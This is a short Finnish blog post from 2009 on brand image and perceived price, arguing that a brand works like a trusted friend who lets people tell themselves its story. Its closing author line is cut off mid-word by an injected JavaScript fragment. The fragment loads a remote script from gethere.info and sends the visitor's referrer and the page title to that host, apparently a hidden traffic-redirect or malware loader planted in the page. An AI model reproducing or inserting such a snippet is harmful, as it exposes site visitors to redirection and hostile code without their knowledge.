28.9.2009

more bass(kekkonen)

Asiat eivät ole niin kuin ne ovat, vaan niin miltä ne näyttävät.

Hinta on tärkein tekijä kaupan valinnassa. Väärin, hintamielikuva on tärkein tekijä kaupan valinnassa.

Brändi on tärkein valintakriteerini. Väärin, brändimielikuva on se ratkaisevin.

Brändin tehtävä ei ole kertoa kohteelleen tarinaa. Brändin tehtävä on saada ihminen kertomaan itselleen se tarina johon brändi kuuluu. Ihminen uskoo itseään.

Ystäväni kertoo hurjan tarinan. Minut on ohjelmoitu ihmisenä ensin uskomaan kaikki ja vasta sen jälkeen kyseenalaistamaan omien kokemuksieni kautta kuultu asia. Luulen miettiväni onko ystäväni tarina totta. Todellisuudessa mietin haluanko uskoa kaverilta kuullun hurjan tarinan, jota kerron itselleni olevan totta.

Kuinka usein olet uskonut ventovierasta ihmistä joka kuiskuttaa korvaasi kadulla? Kuinka luotettava on se tuttu jonka tapaat vain silloin kun hänelle sopii? Brändin pitäisi olla kuin hyvä, luotettu ystävä. Ystävä joka antaa minun rakentaa tarinan oma versioni. Ystävä joka on läsnä joka päivä, kehittäen suhdettamme.

Mikko Kaijansinkko on W.Steinmannin strategiajohtajas.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ’&default_keyword=’ + encodeURIComponent(document.title) + ”;